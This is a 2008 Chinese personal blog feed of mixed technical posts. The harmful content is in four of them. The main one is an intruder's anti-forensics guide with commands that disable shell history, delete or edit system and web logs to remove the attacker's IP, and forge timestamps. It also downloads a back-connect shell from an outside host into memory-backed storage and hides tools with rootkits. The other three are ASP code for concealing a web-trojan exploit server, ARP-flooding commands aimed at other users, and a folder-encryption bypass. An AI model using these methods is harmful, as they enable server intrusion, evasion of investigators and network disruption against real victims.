狂人日记

网通开始限制多线程下载了？

Tue, 13 May 2008 09:22:14 +0800

这几天在下ubuntu，想玩玩。只要我用多线程的下载，立马所以的网络就不通了，不仅是我自己的网络，其他人的也有影响，开始我以为是迅雷的事，马上就换成了快车，依然不行，包括我换成了电驴也不行。

一般的症状就是开始下载的速度很快，过了不到一分钟，变成就几K，在过一会就不动了，交换机上所以的机器都不能上网了，能上的就是几个大站能打开，基本上其他的都被指到了网通的QJ网站（IP最后一位是133的那个站）。网通这个可真行，不让你下了，还给自己挣些广告费，丫的没上google的广告，要不点死。

PS：看看这个，没办法啊，http://www.cnbeta.com/articles/55405.htm

深藏25年的操作系统Bug被消灭

Tue, 13 May 2008 08:55:47 +0800

哇塞，真是强啊！

1983年，那时还是IBM PC XT、Apple Lisa的时代，也是这个BSD操作系统中臭虫诞生的年代，这个bug直到几天前才被消灭。
几天前，一位名为Marc Balmer的OpenBSD开发者收到来自用户的邮件，邮件中用户称在某些情况下为MS-DOS文件系统提供服务会导致SAMBA崩溃。Balmer随后同SAMBA的开发者取得了联系，但是SAMBA开发者声称这是在所有BSD系统代码中都存在的一个bug。

起初Balmer根本不相信这个问题会出现在BSD操作系统上，他说：“我第一反应当然是责怪Samba”。但是经过仔细研究后，他发现这个bug确实存在，最早出现在1983年发布的4.2 BSD中，并且问题一直没有得到修正，包括Mac OS X同样“继承”了这个bug。

问题出现在*dir()库中，它的最初开发者大牛Marshall Kirk McKusick也来亲自过问，当然这个存在了25年才被发现的问题很快得到了解决，另一方面也足可见BSD生命力顽强。

为什么2008显IP版QQ聊天时自动发送未知图片

Mon, 12 May 2008 14:19:28 +0800

为什么2008显IP版QQ聊天时自动发送未知图片，包括飘云/传美/狂人等版本本文来自死性不改的博客 http://www.clxp.net.cn 转载请保留此申明！
最近突然注意到有时和别人聊天时就会自动发送图片。但是自己看不到。别人看得到。但是等图片显示
了。看到的却只是文字。根本没有图片~当时很奇怪。没去思考。。。
今天无奈中发现这个问题挺恼火~严重影响情侣之间的交谈~于是就百度了一下。
得到一些结果。但是并不全。附一张效果图吧。

500){this.resized=true;this.style.width=500;}">

造成这个问题的起因是显IP外挂加强了IP探测功能。以前我们就知道想让对方IP显示出来。给他发个图片。就显示了。。现在IP外挂作者替我们想到了。但是也带来一些困惑。还以为是中毒呢~
所以到现在为止就不要怕了。不是中毒。而是显IP外挂自身的功能。
说下解决办法吧~

1、珊瑚虫IP外挂的解决办法。
QQ安装目录下。找到“CoralQQ.ini”文件。然后Ctrl+F搜索字符MsgDetectIP=1。
把1改为0。保存。重新登陆QQ即可。

500){this.resized=true;this.style.width=500;}">

2、传美QQ的IP外挂的解决办法。
照图做就可以了。

500){this.resized=true;this.style.width=500;}">

3、狂人、快乐无极版以及是使用FinePlus版本的显IP外挂的解决办法。
找到QQ安装目录下的“FinePlus.ini”然后Ctrl+F搜索字符
;是否启用CacheIP
010f=1
;是否自动生成小图片(0,禁止,1,当前无IP则执行,2,启动以来都无IP则执行,3,Cache无IP则执行)
0110=0

4、飘云版的自集成外挂版本的解决办法（测试）
找到QQ安装目录下的“Verplus.ini”搜索字段Isfind=1。把1改0保存。然后重新登陆QQ。
这个是我自己猜的。因为没有明确的注视。所以改来看看效果了。如果您知道具体如何改。请告诉我下。

网马中枢

Mon, 12 May 2008 14:11:59 +0800

作者：余弦
来源：0×37 Security

其实想想就会知道，网马的exp总会有暴露的时刻，也就是说，我的系统环境只要满足条件就可以获得这个网马的exp。通过结合服务端的技术手段，我们可以隐藏网马exp的地址，但是却无法保证这个exp不暴露出来，exp终究要在你的浏览器上执行恶意行为。
比如下面code可以隐藏网马exp的地址，却不得不暴露出这个exp：

http://127.0.0.1/s_trojan/index.html的代码：

http://127.0.0.1/s_trojan/blackbox_0.asp的代码：

http://127.0.0.1/s_trojan/blackbox_1.asp的代码：

document.write(’js go here……’)
<%
function xss()
response.write “alert(’hello asp.’);”
end function
xss()
function f(filename)
set objFSO=Server.CreateObject(”Scripting.FileSystemObject”)
set objCountFile=objFSO.OpenTextFile(Server.MapPath(filename),1,True)
f=objCountFile.readall
objCountFile.close
set objCountFile=nothing
set objFSO=nothing
end function
x=f(”last_trojan.html”)
response.write x
%>
trojan()

最终的网马exp地址为http://127.0.0.1/s_trojan/last_trojan.html。blackbox_1.asp的代码既要保证服务端正确执行，又要保证客户端能正确执行其最终的JS代码。其实这些中间asp文件会暴露最终的网马exp的内容。但是却不会暴露地址。

结合服务端技术其实能做很多事，网马也将更加强大，更容易以服务端为中心而被控制着:-)。强大的网马中枢应该要能判断目标系统的环境而选择性地运行，并有详细的统计功能。这样会给跟踪者带来许多麻烦:-)。但，是不是能真正隐藏网马exp呢？原则上是不行的，因为exp总要输出，否则你的浏览器漏洞如何被触发？

MySQL忘记密码处理方法解决办法

Sat, 10 May 2008 13:25:23 +0800

MySQL忘记密码处理方法解决办法：
1。停止mysql服务。//打开命令行窗口，停止mysql服务： Net stop mysql
2。启动mysql，一般到mysql的安装路径，找到 mysqld-nt.exe
执行：mysqld-nt --skip-grant-tables 当前窗口将会停止。
3。另外打开一个命令行窗口，进入MYSQL的安装位置下BIN目录，运行mysql
4。输入如下命令：
>use mysql
>ｕpdate user set password=password("new_password") where user="root";
>flush privileges;
>exit
6。用Ctrl+Alt+Del，找到mysqld-nt的进程杀掉它，在重新启动mysql-nt服务，就可以用新密码登录了

对抗网络执法官等软件攻击的利器arpfree

Fri, 09 May 2008 14:41:39 +0800

使用方法：
首先安装winpacp驱动，发送的时候可以选择ARP的TYPE。如果是ARP请求报文，则只要输入要问的IP地址，如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址。
最后的发送速度可选参数为：（大小写敏感）

fast----------最快
hear---------每60MS一个包（比较适合结合SNIFFER做监听）
slowhear---每500MS一个包
auto---------每1秒一个包
slow---------每2秒个包

实例

反击网络执法官，网络终结者的攻击：
1：发动比他更强烈的攻击：
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
这里是你想攻击的人的IP地址
2：交换机竞争：

arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
这里是你想攻击的人的MAC地址

1：情况将导致他IP地址冲突（比“终结者”来的猛烈多了）
2：情况将使得他无法连接网络（由于交换机把他的流量都给你了）

可笑的文件夹加密大师

Fri, 09 May 2008 14:35:57 +0800

文章作者：樱花浪子
原始出处：http://www.hacklu.net
转载请保留版权，请相互尊重。　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　

　　最近在找一款加密文件夹的工具，于是百度了一下发现N多，但是利用原理很多都是利用WIN缺陷的".."加密，可能有很多朋友知道，也可能有很多朋友不知道这种原理，网上有一种软件利用这个自称是XX加密大师，汗……

大家知道在CMD下可以用MD NAME..\建立带点的文件夹，这样建立完我们发现，无法打开和改名、删除等。会出现xxxx引用一个不可用的位置，其实程序利用的就是这个原理，把要加密的文件夹，用API将要加密的文件夹名称后面加上..\,解密的时候再把它去掉。

　　这里以云南黑客联盟的超强文件加密目录为例，首先我们建立一个test的文件夹，里面建一个test.txt的文本。用这个东东进行加密，加密后test文件夹会变成test.如图1，这时无论我们打开、删除、改名等都会弹出如图2的对话框。

550)this.width=550;" />

　　那怎么破解呢，只要我们在运行里输入：W:\test\test..\这里注意一下文件夹第一次打开的时候会一闪关掉，我们只要在运行里再输入一遍W: \test\test..\文件夹就会乖乖的出来了，而且我们可以进行复制，移动等。如果我们想删除只要用rmdir x:\test..\ /s一切就没了。

　　但在测试的时候我发现如果上一级目录有空格的话如W:\te st\test..\在运行里输入就会出现图3的错误，这里我们假设一下如果加密者把文件夹加密在一个含空格的文件夹中呢？其实这个也很简单，如果像W: \te st这里我们有权限重命名的话我们可以改名把空格去掉，但如果像C:\Documents and Settings这样的系统文件夹我们没有权限重命名的时候只要我们进入相应的文件夹下用md x:\md...\在建立一个就可以进去了。

在假设如果加密者在硬盘根目录建立一个带空格的文件夹，然后进行加密，这样我们运行x:te st..\或者在X盘根目录用md te st...\都是不行的，都会被te这里断掉，这时我们只要用短文件名照样可以进去或者删除，例如我在w盘建立一个te st，里面建立一个OK的文本，然后用上面的工具加密就会变成了“te st.”我们进入cmd下w盘的根目录，执行dir /x，看看吧，短文件名都出来了，te st.对应的就是TEST~1，我们继续执行md TEST~1..\回到w盘看看会多一个TEST~1.的文件夹，里面的OK文本文件也出来了。图4。

550)this.width=550;" />

文章我已经做了动画，有兴趣的朋友可以看下，最后劝大家一句不要在相信网络上流传的不现实的东东，比如说手册论坛里最近流传一个只知道IP就可以开启远方摄像头的软件，我已经在“菜鸟疑惑”顶置了相应的帖子。

linux入侵踪迹隐藏攻略v0.1

Fri, 09 May 2008 14:31:56 +0800

作者：xi4oyu

免责声明：

本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责,转载请保留。

0．前言：
被警察叔叔请去喝茶时间很痛苦的事情，各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深，是我们必须掌握的基本功。当然，如果管理员真的想搞你而他的功力又足够足的话，相信没什么人能够真正的“踏雪无痕”。Forensic 与Anti-Forensic，说到底只是你和管理员之间的技术间较量而已。貌似很少有专门说这个的文章，大部分就是下载个日志擦除的软件，然后运行下就可以了，对小站可以，但对方如果是经验丰富的管理员呢？我们该如何应对？我在这里只介绍unix-like system下的，至于windows或者其他什么系统下的，欢迎各位道友补充。

1.
最小化你的日志

P.S 访问目标前用跳板我就不废话了，你是VPN也好3389也罢，ssh中转，代理都行。总之记住一点—直接连接攻击目标是愚蠢的

1.1
shell使用问题
目前linux下大多数的shell都是采用bash或者其他的什么shell 通过输入输出重定向来实现与服务器的交互的，当我们使用ssh 或者telnet之类的登录的时候，我们的命令都会被记录在shell 的history文件下面。举例来说bash会在当前目录下面.bash_history文件里记录下你此次登陆操作的命令，如果你拿这台机器当跳板的话，或者扫描其他机器，你的命令都会被记录下来哦。呵呵，所以我们登录的第一件事就是执行如下命令：

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

当然不同的shell写法可能不同，像有的set设置环境变量什么的。大家根据自己的shell自行修改。记住：从 webshell弹回的shell也会记录你的操作，值得庆幸的是现在很多弹shell的脚本都预先unset 环境变量。
我们还需要记住的是在登录的时候出现在登录窗口的一些信息，比如该用户在什么时候从哪个IP登录进来的等等，这在我们后面的用于日志清除与修改的时候要用到。
如图：
[attach]3067[/attach]

作为跳板的时候，我们有可能需要用本机的ssh去访问别的机器，但是别的机器的公钥呢？总不能放在当前用户的目录下吧？当然你可以事后删除，但多一事不如少一事，你说对么？
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
就可以了，但在这样运行某些命令的时候可能会有提示，说你的stdin不是个terminal，这里可以这样解决：
python -c 'import pty; pty.spawn("/bin/sh")' 或者自己再建立个ttyshell。

1.2
webshell的选择问题
可能各位道友的日常生活中最主要目标瞄向了webserver 。现在的web也是大多数入侵的一个突破口。Linux下用的最多的就是apache服务器了，当我们发觉一个服务器的漏洞时候很可能要上传一个webshell来进行对服务器文件进一步的操作和信息的搜集，部分webshell也提供了反弹shell的功能。如何能够在apache服务器的日志文件中留下最小的记录也是需要深究的。这种情况通常发生在没能够获得足够的权限来清除apache日志。如果能够root了，则可以将重点放在第二节日志清除上。通常，日志只记录GET的信息，比如你的注入，你采用了那种方式提交数据等等。如果我们的 webshell采用的多是GET方式交互的话，就很容易在httpd的access_log中留下很多日志。这些以后都会被作为证据所采纳的。Phpspy是个很好的选择，作者也注意掉了这点，取消了GET方式的交互，再给webshell起一个比较迷惑的名字，这样我们与webshell的交流就更加隐秘。

2.
日志的清除与改写
日志清除与改写，俗称擦PP，这是个很重要的过程，日志记录了你对目标机器的操作记录，大部分的入侵者查找都是通过日志来确定的，因此，我们需要对日志文件进行操作。对日志操作有这么个说法，能修改的就不清除，这样才能最小的减少管理员的怀疑。Linux下的大多数文件是以文本方式，或者以简单的结构体方式存入文件的，这就为我们修改某个日志记录里的具体内容提供了前提条件。
需要注意的一点是，我们需要先看看日志的存放位置，有的管理员会修改日志保存的位置，一般来说，我们可以查看/etc/syslog.conf来获得log文件存放的位置。但要注意的是，有的管理员(及其负责)会重新编译syslogd文件来重新指定log存放的位置，怎么办？在这种情况下可以用strings来看下/sbin/syslogd这个文件，这种管理员我只在书里看到过，至少我没遇到过: P。这个配置文件里面记录了系统存放某些log的目录，如secure文件等。下面我们就会根据这个文件来清理和修改日志。
现在可以在网上公开获得的日志清除程序代码很粗糙，我曾经看到过最夸张的清日志的代码像这样:
rm -rf /var/log/lastlog ; rm -rf /var/log/telnetd ; rm -rf /var/run/utmp ; rm -rf /var/log/secure ; rm -rf /root/.ksh_history ; rm -rf /root/.bash_history ; rm -rf /root/.bash_logut ; rm -rf /var/log/wtmp ; rm -rf /etc/wtmp ; rm -rf /var/run/utmp ; rm -rf /etc/utmp ; rm -rf /var/log ; rm -rf /var/adm ; rm -rf /var/apache/log ; rm -rf /var/apache/logs ; rm -rf /usr/local/apache/log ; rm -rf /usr/local/apache/logs ; rm -rf /var/log/acct ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/log/proftpd/xferlog.legacy ; rm -rf /var/log/proftpd.access_log ; rm -rf /var/log/proftpd.xferlog ; rm -rf /var/log/httpd/error_log ; rm -rf /var/log/httpd/access_log ; rm -rf /etc/httpd/logs/access_log ; rm -rf /etc/httpd/logs/error_log ;rm -rf /var/log/news/suck.notice ; rm -rf /var/spool/tmp ; rm -rf /var/spool/errors ; rm -rf /var/spool/logs ; rm -rf /var/spool/locks ; rm -rf /usr/local/www/logs/thttpd_log ; rm -rf /var/log/thttpd_log ; rm -rf /var/log/ncftpd/misclog.txt ; rm -rf /var/log/ncftpd.errs ; rm -rf /var/log/auth ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history –r

整个一rm集合，要是服务器跑了很长时间，积累了很多日志。你这样一删除，的，你帮他省事了，他也省事，一眼就看出有人进来了。
先不说其他，用rm删除就不可取，正确的删除文件做法是用shred
shred -n 31337 -z -u file_to_delete
这样多次擦除才够安全。呵呵
下面具体的针对日志文件进行分析。
W命令提供了管理员查看当前登录帐户的功能，所以与管理员同台共演是件很危险的事情，能不做就不做，但也有人曾经上演过local exp后，装上tty 然后T管理员下线截获登录密码的好戏。呵呵，如何让w不显示你登录了呢？
用rootkit我就不废话了，这里有个小窍门，即使是普通用户登录管理员也不能看见：
在跳板上登录目标ssh -T somebody@1.1.1.1 /bin/bash –i 你可以试试，很好用哦。

OK，言归正传
首先第一个概念是timstamp，也就是你用ls –l 看到的东西，我们在修改一个LOG文件之前或者留后门之后都得留心下这个时间，有很多管理员喜欢通过timestamp来查找入侵者留下的东西。记住以下命令
touch -r 具有你希望改成的时间的文件你要改变的文件他能够使得两个文件的timestamp保持一致。
在你修改日志之前，你可以在/dev/shm下面建立一个临时文件，并将log的timestamp保存下俩，然后再touch回去。为什么要用/dev/shm 目录在第三节会有说明。当然我们也可以用程序实现，不过有的时候我们会碰到没有见过的日志类型，所以有时候需要手工改写日志。除了时间之外，还需要注意文件的其他属性，比如所有者或是否有粘滞位等等。这些都需要注意。

Linux 的日志散落在系统各处，同时系统管理员也能够灵活的制定日志保存的位置，这就要求我们非常小心，采用通用的日志移除或改写工具是很不明智的，为此我们要对需要修改的日志系统有个全面的了解。具体的内容请参看文章《Linux服务器日志管理详解》。
这里提供个工具
http://lists.darklab.org/pipermail/darklab/2006-May/000234.html
怎么使用自己去看看吧。我个人还是倾向于某个日志用某个特定的清除或修改器，这样灵活性更大点。
我们也可以使用sed命令行工具来清除某些日志，通常我会这样修改web日志:

touch /dev/shm/timestamp; touch -r access_log /dev/shm/timestamp;sed'/192\.168\.44\.1/d' access_log > /dev/shm/backlog ; cat/dev/shm/backlog > access_log; touch -r /dev/shm/timestamp./access_log ;shred -n 255 -z -u /dev/shm/timestamp;

这里192.168.44.1是我跳板的IP。
具体的log修改和擦除工具，各位道长就从网上下个现成的自己改改吧，呵呵，我就不在这献丑了。
还有一点，我们要将wtmp文件中的登录日志修改成原来管理员登陆的IP和时间也就是第一节中记下的时间与IP。如果实在得不到 root权限，我们也可以ssh localhost一下来隐藏登录IP。

3.
工具与数据的隐藏
3.1工具与数据的临时存放
当我们需要在服务器上留下某些程序的时候，比如sniff软件，或者作为跳板攻击其他服务器的时候，我们不得不面对着一个痛苦的抉择：既要能够留下足够的工具来完成必要的任务，又要经可能少的对文件系统乃至对磁盘的数据的改写。在这种情况下，如果所要保存的数据只是临时的，我们就需要在内存中建立起文件系统。这样，当系统再重启后我们曾经在磁盘上保留的信息就会被擦除，因为它没有被真正的写到磁盘上面去。（注意：通常我们只用这种方法来保存暂时用的程序、代码等工具，如果要长久保存的不推荐此种方法）
为此，我们需要建立ramfs,它是一个在内存中存在的文件系统。具体的介绍请各位道友自行查找相关文档查看。建立ramfs很简单，不过需要有root权限。代码如下：
mount -t ramfs ramfs /usr/tmp
这样/usr/tmp目录就被挂载为一个内存文件系统。当然，在实际过程中我们可能要找一个隐藏比较深的不用的目录来做为挂载点。
那在我们没有root的情况下呢？有时候，我们可能会遇到某个websever的php代码有个remote execution的洞洞，在webserver 的目录下不可写的时候，我们可能会用到wget来下载一个回连的shell到一个都可以写的目录，比如/tmp
通常我们会这样做：
Wget http://xxxx/backshell.pl -P /tmp
但是否想过/tmp或许只是一个普通的ext3或者reinfs文件系统，最多充其量是个tmpfs，这些文件系统有个特点就是会与磁盘交互。那我们应该选择什么目录来保存我们的代码呢？在现代的linux操作系统中，默认挂载了/dev/shm目录其类型就是ramfs，作为系统共享用。我们就可以利用它来完成保存shell的目的。

3.2工具与数据的长期存放
目录的隐藏是个很高深的学问，在最开始的阶段，我们通常是在一个很深的目录里面建立名为”…” 或者” ”等的目录，然后把工具一股脑的放进去，这招在对付不负责任的管理员的时候很管用，但是遇到负责人的管理员一个find语句就能把你找出来：
# find / -uid 0 –perm -4000 –print
# find / -size +10000k –print
# find / -name “...“ –print
# find / -name “.. “ –print
# find / -name “. “ –print
# find / -name “ “ –print
留setuid的程序也是个大的忌讳，这样很容易引起管理员的怀疑。特别是这个setuid程序存在莫名其妙的目录下的时候。
在大多数情况下，我们可以借助 rootkit来帮助你完成这个功能。
我简单的介绍下，像linux下的rootkit，总体来说可以分为两大类：应用层和内核态的rootkit。
应用层的rootkit通常通过修改某些文件来实现信息隐藏，比如修改ls 让其不显示某个特殊名称文件夹，修改ifconfig让其不显示PROMISC位
还有的是通过修改 so
文件来留后门等等。如果管理员安装了tripwire之类的完整性校验工具各位道友就要小心了，不过一般的管理员也没那么负责。这些低级的rootkit很容易给chkrootkit之类的工具给揪出来，要真正用的话最好自己能下载源代码重新编译下，修改掉配置文件的默认位置，这样好点。
内核级别的rootkit:顾名思义，进入ring0级别来HOOK掉某些系统调用或者其他什么乱起八糟的方法来改掉系统调用的执行输出（当然也ring3 patch ring0也有，像suckit）。这种东西很诡异，能够真正成功装上的几率不大，关键看人品，呵呵。进入了2.6时代，很多美好的rootkit都失去了光彩。加之2.6的模块编译要内核树的支持，更使得LKM方式的 rootkit举步维艰。据wzt讲，suckit也有2.6版本的，不过是private的要money。偶等穷人也只有干看到份了。
2.6的rootkit安装可以看看包总的adore-ng教程 wnps也不错，不过wzt这BB也停止开发了
。还有什么内核静态patch等方法，也只是在phrack里面看到过，各位道友用过的给我介绍下啊，呵呵。

扯远了，关于如何隐藏文件，当然你也可以采用伪造坏扇区的方法，将你的东西放在那里，一般的文件系统算是看不出来了。你可以用特殊的工具对其进行存储。这个再以后的advance anti-forensic文章中会讲，不再多说。

4.
如何安装和编译工具
可能linux与windows对于用户来说，最大的不同就是linux从网上下载的大多数都是src 源代码包，要使用的话需要在机器上现场编译，好不容易有编译好的发行包如rpm
deb还是和系统相关的依赖性啊，等等，烦都烦死人了。像要装个ettercap,什么ｌｉｂｎｅｔ libpcap都得装上，但有时候我们的目标机器上没有所需要的依赖文件，这怎么办呢？不推荐使用rpm
dpkg 等方式来安装需要的文件，也不推荐apt yum源等方式安装，从源代码编译把，这样比较好点。
我们把下载的源代码放到自己的隐藏目录里，在configure的时候需要指定prefix安装路径，总不能把这些包真正的装到系统里面把，指定成我们的隐藏目录就好，这样一来，管理员也不会发现怎么系统安装了许多原本没有支持的库文件或者头文件了。
最后一步，当编译我们的工具时，需要指定所依赖的头文件目录和库文件目录，不要执行make install命令，这样一来，我们的工具就可以完全在我们的隐藏目录里面了。
关于perl的模块安装，可以参看这边文章：
http://servers.digitaldaze.com/extensions/perl/modules.html

先写这么多吧，呵呵，有想到的再加上。后头还会写篇Advance anti-forensic的文章。可能有的道友会说我太小心。小心好啊，小心使得万年船，不是么？呵呵

四种网页跳转代码

Fri, 09 May 2008 09:16:36 +0800

如果你要在服务器端跳转，可以这样：

Response.Redirect(http://www.woidiy.com/blog/)
Response.End

如果你要在客户端跳转，可以这样：

如果你要让页面显示几秒钟之后跳转，可以在html代码的部分加上这样的代码：

（3秒钟后自动跳转到www.517z.com）

这种用来做广告很有效果。。

使用winpcap定制TCP包发送

Thu, 08 May 2008 16:43:48 +0800

by 云舒

前些时候做DOS方面的测试，由于协议学得不够好，有些回应不记得，所以就首先想到用hping来定制一些包，看看远程主机的回应。结果下载的hping 死活都不发包，换了多个不同版本的winpcap都不行。一怒之下，决定自己写个简单的。首先想到的是perl来做，最后觉得一样要安装 winpcap还有很多别的模块，不如直接c来实现一下，来得更痛快。

需要说明一下的是，在以太网头那里我故意偷懒了，没有获取本机的MAC地址而是写了个错误的。所以给内网用户发包的话，能发出去，只是你收不到回应了，发给外网就没这个问题，这是因为同交换机下面靠MAC地址来定位的。

最后一点，这里所有的包，目的MAC地址都是写的MAC，通过网关把数据转发出去的。虽然同交换机下面可以直接通过MAC定位，但是我懒得判断，直接发送给网关再转发会比较简单。

/* Code By yunshu, 2008-05-08, Make tcp packet to send to remote server
* I don't know which version of winpcap needed by hping, so I wrote this code.
* Under winpcap 4.0.2, Dev-CPP 4.9.9.2, windows xp professional sp2
*/

#include
#include
#include
#include
#include
#include
#include

#define IP_PROTO 0x0800

char LocalIP[20] = { 0 };
char InterfaceName[256] = { 0 };
char GatewayIP[20] = { 0 };
BYTE GatewayMac[6];

typedef struct et_header
{
unsigned char eh_dst[6];
unsigned char eh_src[6];
unsigned short eh_type;
}ET_HEADER;

typedef struct ip_hdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;

typedef struct tcp_hdr
{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
}TCP_HEADER;

typedef struct tsd_hdr
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSD_HEADER;

unsigned short CheckSum(unsigned short * buffer, int size)
{
unsigned long cksum = 0;

while (size > 1)
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size)
{
cksum += *(unsigned char *) buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);

return (unsigned short) (~cksum);
}

/*
void GetLocalIP( )
{
WORD wVersionRequested;
WSADATA wsaData;
char name[255];
PHOSTENT hostinfo;

wVersionRequested = MAKEWORD( 2, 0 );

if( WSAStartup( wVersionRequested, &wsaData ) == 0 )
{
if( gethostname( name, sizeof(name) ) == 0 )
{
if( (hostinfo = gethostbyname(name) ) != NULL )
{
strcpy( LocalIP, inet_ntoa( *(struct in_addr*)*hostinfo->h_addr_list ) );
}
}
}

WSACleanup( );
}
*/

int GetDevices( )
{
pcap_if_t *alldevs;
pcap_if_t *d;

int i = 0;
char errbuf[PCAP_ERRBUF_SIZE];

/* 获取本地机器设备列表 */
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL /* auth is not needed */, &alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs_ex: %s\n", errbuf);
exit(1);
}

/* 打印列表 */
for( d = alldevs; d != NULL; d = d->next )
{
printf("%d. %s", ++i, d->name);

if (d->description)
{
printf( " (%s)", d->description );
}

if( d->addresses != NULL )
{
if( d->addresses->addr->sa_family == AF_INET )
{

printf( ": %s\n", inet_ntoa( ((struct sockaddr_in *)d->addresses->addr)->sin_addr ) );
}
else
{
printf( "\n" );
}
}
else
{
printf(" (No description available)\n");
}
}

if (i == 0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return -1;
}

printf( "\nPlease choose the index of your NetAdapter：" );
int AdapterIndex = 1;
scanf( "%d", &AdapterIndex );
if( AdapterIndex > i )
{
printf( "网卡选错啦\n" );
return -1;
}

d = alldevs;
for( int index = 1; index < AdapterIndex; index ++ )
{
d = d->next;
}

if( d->name == NULL || d->addresses == NULL )
{
printf( "网卡选错啦\n" );
return -1;
}

strcpy( InterfaceName, d->name );
strcpy( LocalIP, inet_ntoa( ((struct sockaddr_in *)d->addresses->addr)->sin_addr ) );

/* 不再需要设备列表了，释放它 */
pcap_freealldevs(alldevs);

return 1;
}

int GetGateWayMac( )
{
PIP_ADAPTER_INFO AdapterInfo;

ULONG OutBufLen = sizeof(IP_ADAPTER_INFO);
AdapterInfo = (IP_ADAPTER_INFO *)malloc(sizeof (IP_ADAPTER_INFO));
if( AdapterInfo == NULL )
{
printf("Error allocating memory needed to call GetAdaptersinfo\n");
return -1;
}

if( GetAdaptersInfo( AdapterInfo, &OutBufLen ) == ERROR_BUFFER_OVERFLOW )
{
free( AdapterInfo );
AdapterInfo = (IP_ADAPTER_INFO *)malloc( OutBufLen );
if( AdapterInfo == NULL )
{
printf("Error allocating memory needed to call GetAdaptersinfo\n");
return -1;
}
}

if( GetAdaptersInfo( AdapterInfo, &OutBufLen ) == NO_ERROR )
{
PIP_ADAPTER_INFO a = AdapterInfo;
BOOL Found = FALSE;

while( a )
{
if( strcmp(a->IpAddressList.IpAddress.String, LocalIP) == 0 )
{
strcpy( GatewayIP, a->GatewayList.IpAddress.String );
Found = TRUE;
break;
}
a = a->Next;
}
if( !Found )
{
printf( "Get gateway's ip error.\n" );
free( AdapterInfo );
return -1;
}
else
{
free( AdapterInfo );
}
}
else
{
printf( "Get gateway's ip error.\n" );
free( AdapterInfo );
return -1;
}

BYTE Mac[6];
ULONG MacLen = 6;
SendARP( inet_addr(GatewayIP), 0, (PULONG)&Mac, &MacLen );
memcpy( GatewayMac, Mac, MacLen );

/*
for( int index = 0; index < MacLen; index ++ )
{
printf( "%d: %02x\n", index, Mac[index] );
}
printf( "\n%d\n", MacLen );
*/
}

void Usage( char *me )
{
printf( "Make tcp package 0.1, code by yunshu\n" );
printf( "%s: targetip targetport [flag]\n", me );
printf( "flag: \n" );
printf( " u|U set urg flag.\n" );
printf( " a|A set ack flag.\n" );
printf( " p|P set push flag.\n" );
printf( " r|R set rst flag.\n" );
printf( " s|S set syn flag.\n" );
printf( " f|F set fin flag.\n" );
printf( " default is syn flag, and you can use sa to set syn+ack, and more...\n" );
}

int main( int argc, char *argv[] )
{
ET_HEADER EtHeader;
IP_HEADER IpHeader;
TCP_HEADER TcpHeader;
PSD_HEADER PsdHeader;
u_char Buffer[sizeof(ET_HEADER) + sizeof(IP_HEADER) + sizeof(TCP_HEADER)] = { 0 };

if( (argc != 3) && (argc != 4) )
{
Usage( argv[0] );
exit( -1 );
}

int Flag = 2;
if( argc == 4 )
{
Flag = 0;
if( strchr(argv[3], 'U') || strchr(argv[3], 'u') )
{
Flag = Flag | 32;
}
if( strchr(argv[3], 'A') || strchr(argv[3], 'a') )
{
Flag = Flag | 16;
}
if( strchr(argv[3], 'P') || strchr(argv[3], 'p') )
{
Flag = Flag | 8;
}
if( strchr(argv[3], 'R') || strchr(argv[3], 'r') )
{
Flag = Flag | 4;
}
if( strchr(argv[3], 'S') || strchr(argv[3], 's') )
{
Flag = Flag | 2;
}
if( strchr(argv[3], 'F') || strchr(argv[3], 'f') )
{
Flag = Flag | 1;
}
}

//GetLocalIP( );
if( -1 == GetDevices( ) )
{
exit( -1 );
}

//printf( "Adapter is %s, ip is %s\n", InterfaceName, LocalIP );

if( -1 == GetGateWayMac( ) )
{
exit( -1 );
}

//printf( "Gateway IP is %s\n", GatewayIP );
//printf( "Gateway Mac is %x\n", *GatewayMac );

memcpy( EtHeader.eh_dst, GatewayMac, 6 );
memset( EtHeader.eh_src, 0xa, 6 );
EtHeader.eh_type = htons( IP_PROTO );

IpHeader.h_verlen = (4<<4 | sizeof(IpHeader)/sizeof(unsigned int));
IpHeader.tos = 0;
IpHeader.total_len = htons(sizeof(IpHeader)+sizeof(TcpHeader));
IpHeader.ident = 1;
IpHeader.frag_and_flags = 0x40;
IpHeader.ttl = 128;
IpHeader.proto = IPPROTO_TCP;
IpHeader.checksum = 0;
IpHeader.sourceIP = inet_addr( LocalIP );
IpHeader.destIP = inet_addr( argv[1] );

TcpHeader.th_sport = htons( rand()%60000 + 1024 );
TcpHeader.th_dport = htons( atoi(argv[2]) );
TcpHeader.th_seq = htonl( rand()%900000000 + 100000 );
TcpHeader.th_ack = 0;
TcpHeader.th_lenres = (sizeof(TcpHeader)/4<<4|0);
TcpHeader.th_flag = Flag;
TcpHeader.th_win = htons(512);
TcpHeader.th_sum = 0;
TcpHeader.th_urp = 0;

PsdHeader.saddr = inet_addr( LocalIP );
PsdHeader.daddr = IpHeader.destIP;
PsdHeader.mbz = 0;
PsdHeader.ptcl = IPPROTO_TCP;
PsdHeader.tcpl = htons(sizeof(TcpHeader));

